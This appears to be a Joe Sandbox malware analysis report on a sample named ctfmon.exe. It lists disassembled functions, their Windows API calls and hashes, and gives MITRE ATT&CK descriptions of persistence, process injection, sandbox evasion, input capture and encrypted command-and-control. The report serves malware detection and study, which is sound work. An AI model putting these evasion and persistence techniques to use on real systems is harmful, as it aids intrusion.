Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: 1ba185d3060239f3f9112fcedcc335b858bee9d5233abf8df5b3434db70f708b
Instruction ID: 80a56d3aed95c468bd87d356a319ccf427369d6e1cb2682b21b51dc1b754c7b8
Opcode Fuzzy Hash: 1ba185d3060239f3f9112fcedcc335b858bee9d5233abf8df5b3434db70f708b
Instruction Fuzzy Hash: 5741DF3280425C2EDB118714CDA9FFB7FA99B12740F1804FED585C7252CB294989D7AA

Function 0040C6E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

IsChild.USER32(?,?), ref: 0040C704
GetWindowLongW.USER32(?,000000EC), ref: 0040C71B

Strings

0, xrefs: 0040C790

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: ChildLongWindow
String ID: 0
API String ID: 1178903432-4108050209
Opcode ID: 51c1396d00b18aa145fec76cfe13e6a58820fd4ce7605e36329d660915a6127a
Instruction ID: 80f36ecc902128788ccff313db005aea39b01ff33b9cc0f7ff94248ddef8e30b
Opcode Fuzzy Hash: 51c1396d00b18aa145fec76cfe13e6a58820fd4ce7605e36329d660915a6127a
Instruction Fuzzy Hash: 1F218B22101206E6DB31AB358CC5B6B66589F507A5F241B3FBC06B32C2DB3DCD4199AC

Function 00415D61 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00000220,?,00407093,00000000,00000000,00000000,00000000,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415D8D
GetStringTypeA.KERNEL32(@,00000100,?,?,?,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415DF8

Strings

@, xrefs: 00415DCD, 00415DF7

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: ByteCharMultiStringTypeWide
String ID: @
API String ID: 3139900361-216407459
Opcode ID: 0894872d51583d29e9f411928d0752d51c31d1bf5a6ee4355dc6dfac94347f61
Instruction ID: c75d9d2e149fe478884894de742f27978b31c81d622bbf0292b479ae06dd18f0
Opcode Fuzzy Hash: 0894872d51583d29e9f411928d0752d51c31d1bf5a6ee4355dc6dfac94347f61
Instruction Fuzzy Hash: 20217F31D0070AEBCF218F98EC459DEBBB5FF88314F20851AE55077290D3759A95DB54

Function 00416D3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,00416871,?), ref: 00416D5A
GetStringTypeW.KERNEL32(?,?,00000000,qhA,?,?,?,?,?,?,00416871,?), ref: 00416D6C

Strings

qhA, xrefs: 00416D64

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: ByteCharMultiStringTypeWide
String ID: qhA
API String ID: 3139900361-109923292
Opcode ID: 90facd2c636960555e395354108c39abe314cbde9bea42ad8a5fe578146252ea
Instruction ID: 89e0a92cda9d94ff151431ccce99fae9d9c15686a517ecb08ba51b8be8b920dd
Opcode Fuzzy Hash: 90facd2c636960555e395354108c39abe314cbde9bea42ad8a5fe578146252ea
Instruction Fuzzy Hash: ABF0FE32A01559EFCF218FD0ED859EEBF72FB04364F114625FA11611A0C7358961DB95

Function 0041DC70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23stringCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32(?,?,00000010), ref: 0041DC8E
lstrcmpA.KERNEL32(?,ComboBox,?,00000010), ref: 0041DC9E

Strings

ComboBox, xrefs: 0041DC98

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: ClassNamelstrcmp
String ID: ComboBox
API String ID: 3770760073-1152790111
Opcode ID: 42d2bba44a04ed7f1c275f7866e4d06977ae23231fb73cfe7ca8ff7cb1aa41ff
Instruction ID: 49f8500e78018a632b0791ce0c797fe6f4d891fdbedeabdab1c9b0ad4b943904
Opcode Fuzzy Hash: 42d2bba44a04ed7f1c275f7866e4d06977ae23231fb73cfe7ca8ff7cb1aa41ff
Instruction Fuzzy Hash: D9E0DFB0B002006BD724AB248C49AAA32E8F754701FD40D5CF108C11A1FBBAD589CB9A

Function 00428B13 Relevance: 5.1, APIs: 4, Instructions: 62COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00428B70
LeaveCriticalSection.KERNEL32(?,?), ref: 00428B80
LocalFree.KERNEL32(?), ref: 00428B89
TlsSetValue.KERNEL32(?,00000000), ref: 00428B9F

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: CriticalSection$EnterFreeLeaveLocalValue
String ID:
API String ID: 2949335588-0
Opcode ID: 7f312700d13023db20b8708b1166f6760c5c2e3e6c00427aca0f9f7ae2b7f223
Instruction ID: 44b9a5697ca3fe7116b24a0973f7addb02f1af333081b1e9ede574ef100a776b
Opcode Fuzzy Hash: 7f312700d13023db20b8708b1166f6760c5c2e3e6c00427aca0f9f7ae2b7f223
Instruction Fuzzy Hash: 13218931302220EFD7208F45E885B6E7BA4FF45712F50806EF5029B2A2CBB5F842CB58

Function 004133E9 Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapReAlloc.KERNEL32(00000000,00000050,00000000,00000000,004131B1,00000000,00000000,00000000,0040E198,00000000,00000000,?,00000000,00000000,00000000), ref: 00413411
HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,004131B1,00000000,00000000,00000000,0040E198,00000000,00000000,?,00000000,00000000,00000000), ref: 00413445
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 0041345F
HeapFree.KERNEL32(00000000,?), ref: 00413476

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: AllocHeap$FreeVirtual
String ID:
API String ID: 3499195154-0
Opcode ID: fa750299313090193e105ebe2008919bf1dd0b0b930b10b5f1b3f69a44cfefeb
Instruction ID: c5f407516b639af01f7cf3b5c3ec23f839086e4030b11980835d7e942e3d2777
Opcode Fuzzy Hash: fa750299313090193e105ebe2008919bf1dd0b0b930b10b5f1b3f69a44cfefeb
Instruction Fuzzy Hash: 65118230600601DFD7318F69EC499567BB5FFA57157604A2AF1A1CA2B0C771A88EDF44

Function 00428F39 Relevance: 5.0, APIs: 4, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0053F3C8,?,00000000,?,?,00428CBB,00000010,?,00000000,?,?,?,00428413,Vht ,00427DD6,00428419), ref: 00428F74
InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00428CBB,00000010,?,00000000,?,?,?,00428413,Vht ,00427DD6,00428419), ref: 00428F86
LeaveCriticalSection.KERNEL32(0053F3C8,?,00000000,?,?,00428CBB,00000010,?,00000000,?,?,?,00428413,Vht ,00427DD6,00428419), ref: 00428F8F
EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00428CBB,00000010,?,00000000,?,?,?,00428413,Vht ,00427DD6,00428419,004203C5), ref: 00428FA1

Part of subcall function 00428EA6: GetVersion.KERNEL32(?,00428F49,?,00428CBB,00000010,?,00000000,?,?,?,00428413,Vht ,00427DD6,00428419,004203C5,0042601F), ref: 00428EB9

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: CriticalSection$Enter$InitializeLeaveVersion
String ID:
API String ID: 1193629340-0
Opcode ID: 7a3532099ff2bfc6a1059ac9601c8184679287ed949954b4d6ae466d6c0a7985
Instruction ID: 78c625607d6fa9dd441586049681e252a915402f59230de00c6089102d7b9ab4
Opcode Fuzzy Hash: 7a3532099ff2bfc6a1059ac9601c8184679287ed949954b4d6ae466d6c0a7985
Instruction Fuzzy Hash: 67F04471A0121ADFC7209F54FCC499AB76DFB24356B81043BE605D3221DB35A459DFA8

Function 00412554 Relevance: 5.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(?,004101AE,?,0040D099), ref: 00412561
InitializeCriticalSection.KERNEL32(?,004101AE,?,0040D099), ref: 00412569
InitializeCriticalSection.KERNEL32(?,004101AE,?,0040D099), ref: 00412571
InitializeCriticalSection.KERNEL32(?,004101AE,?,0040D099), ref: 00412579

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: CriticalInitializeSection
String ID:
API String ID: 32694325-0
Opcode ID: eb9a2a7dc00640b2fa42e9378dbc490331b9edf8d292a26b3731d10b125d55d1
Instruction ID: c31dbd3ccd9fd40a20c5e7c4c7202aa3fbdad9c40b9ff82e0d969961f7efeac2
Opcode Fuzzy Hash: eb9a2a7dc00640b2fa42e9378dbc490331b9edf8d292a26b3731d10b125d55d1
Instruction Fuzzy Hash: A4C04031901074DBCF533B65FD4784D3FA6EF052603012273E144514308AB11D21DFC8

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ctfmon.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

UDP Packets

DNS Queries

DNS Answers

Statistics

CPU Usage

Memory Usage

Windows Analysis Report
ctfmon.exe

Function 004014B0 Relevance: 247.4, APIs: 41, Strings: 100, Instructions: 635
networkmemorysleepCOMMON

Function 00403190 Relevance: 44.0, APIs: 8, Strings: 17, Instructions: 276
networktimeCOMMON

Function 0042131A Relevance: 13.6, APIs: 9, Instructions: 113
COMMON

Function 00402BA0 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 275
networksleepsynchronizationCOMMON

Function 00404620 Relevance: 43.9, APIs: 8, Strings: 17, Instructions: 189
registryCOMMON

Function 00404150 Relevance: 35.3, APIs: 17, Strings: 3, Instructions: 324
sleepfilememoryCOMMON

Function 00421EF2 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 146
COMMON

Function 004238E8 Relevance: 19.7, APIs: 13, Instructions: 174
windowCOMMON

Function 0042102B Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 175
COMMON

Function 00421D17 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99
COMMON

Function 0042889E Relevance: 15.1, APIs: 10, Instructions: 99
memoryCOMMONLIBRARYCODE

Function 00423C3C Relevance: 10.6, APIs: 7, Instructions: 122
windowCOMMON

Function 00401240 Relevance: 9.1, APIs: 6, Instructions: 91
windowthreadCOMMON

Function 00424D98 Relevance: 9.0, APIs: 6, Instructions: 35
COMMON

Function 00428847 Relevance: 7.5, APIs: 5, Instructions: 35
COMMON